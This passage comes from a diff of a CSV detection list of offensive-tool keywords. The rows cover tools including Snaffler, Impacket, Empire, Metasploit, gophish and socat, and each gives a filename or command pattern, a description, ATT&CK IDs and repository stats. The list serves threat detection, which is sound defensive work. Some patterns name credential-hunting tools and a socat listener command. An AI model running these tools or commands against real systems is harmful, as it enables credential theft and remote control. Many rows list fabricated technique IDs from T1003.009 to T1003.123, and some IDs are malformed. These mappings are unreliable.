T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Config*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/ShareFind*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/TreeWalk*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnafflerMessage.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnafflerMessageType.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" "*SnaffPoint.exe*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*SnaffPoint-main*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*snallygaster*","offensive_tool_keyword","snallygaster","Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.","T1595.001 - T1210","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/hannob/snallygaster","1","0","N/A","N/A","10","2009","240","2023-07-31T07:26:19Z","2018-04-10T12:01:16Z" -"*sneaky_gophish*","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","10","10","134","37","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z" +"*sneaky_gophish*","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","10","10","135","38","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z" "*SniffAir*","offensive_tool_keyword","SniffAir","SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.","T1530 - T1170 - T1059 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Tylous/SniffAir","1","1","N/A","N/A","10","1161","175","2020-10-14T04:00:27Z","2017-02-20T18:32:32Z" -"*sniffer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*sniffer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*sniffer-master.zip*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" -"*SnifferSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SnifferSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*sniffglue*","offensive_tool_keyword","sniffglue","Secure multithreaded packet sniffer","T1040 - T1041 - T1046 - T1057 - T1071.001","TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/sniffglue","1","0","N/A","N/A","10","970","89","2022-07-13T22:44:18Z","2017-09-12T16:26:24Z" -"*snmp_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*snmp_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*snmpwn *passwords.txt*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*snmpwn.rb* --hosts *","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*socat *","offensive_tool_keyword","socat","socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file. pipe. device","T1048 - T1055 - T1562","TA0003 - TA0002 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/craSH/socat","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*socat tcp4-listen:1337*","offensive_tool_keyword","socat","listening on port 1337 -observed in variousmalware and poc explitation tools","T1049 - T1021.001 - T1572","TA0002 - TA0011 - TA0040","N/A","N/A","C2","N/A","1","0","N/A","8","6","N/A","N/A","N/A","N/A" -"*Social Engineer Toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" -"*social_engineering/web_cloner*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation 